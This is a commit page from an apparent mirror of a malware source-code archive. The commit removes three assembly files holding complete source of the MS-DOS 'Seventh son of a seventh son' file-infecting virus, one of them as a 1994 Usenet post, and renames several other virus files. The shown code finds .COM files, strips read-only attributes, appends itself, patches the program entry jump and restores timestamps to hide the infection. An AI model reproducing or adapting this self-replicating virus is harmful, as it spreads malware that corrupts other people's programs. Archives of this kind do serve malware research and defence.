ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-02-21 14:16:02 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

fix/re-organize

Browse Source
This commit is contained in:
vxunderground 2022-08-21 04:12:28 -05:00
parent 4b9382ddbc
commit 62ca392943
8 changed files with 0 additions and 701 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

251
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
View File

@ -1,251 +0,0 @@
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
Xref: netcom.com alt.comp.virus:506
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: 7th Son Virus
Date: 29 Nov 1994 13:02:59 GMT
Organization: Netcom
Lines: 236
Distribution: world
Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com
;***********************************************************************
*****
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;***********************************************************************
*****
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;***********************************************************************
*****
;* Dummy program (infected)
;***********************************************************************
*****
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;***********************************************************************
*****
;* Begin of the virus
;***********************************************************************
*****
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24
vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check
generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear
read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an
EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of
file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and
jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date &
time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;***********************************************************************
*****
;* Interupt handler 24
;***********************************************************************
*****
ni24: mov al,03
iret
;***********************************************************************
*****
;* Data
;***********************************************************************
*****
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin

232
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm
View File

@ -1,232 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 2
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ end - start
MINTARGET equ 1000
MAXTARGET equ -(FILELEN+40h)
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 4Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset end] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0606h
jne verder
lea dx,[bp+offset sontxt-4] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,4Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 4Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
grandfather db 0
father db 0
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin


218
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm
View File

@ -1,218 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin


0
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm → MSDOS/Virus.MSDOS.3apa3a.asm
View File

BIN
MSDOS/Virus.MSDOS.7son.7z Normal file
View File

Binary file not shown.

0
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm → MSDOS/Virus.MSDOS.Azagoth.asm
View File

0
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm → MSDOS/Virus.MSDOS.First-Star.asm
View File

0
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm → MSDOS/Virus.MSDOS.Gogi.asm
View File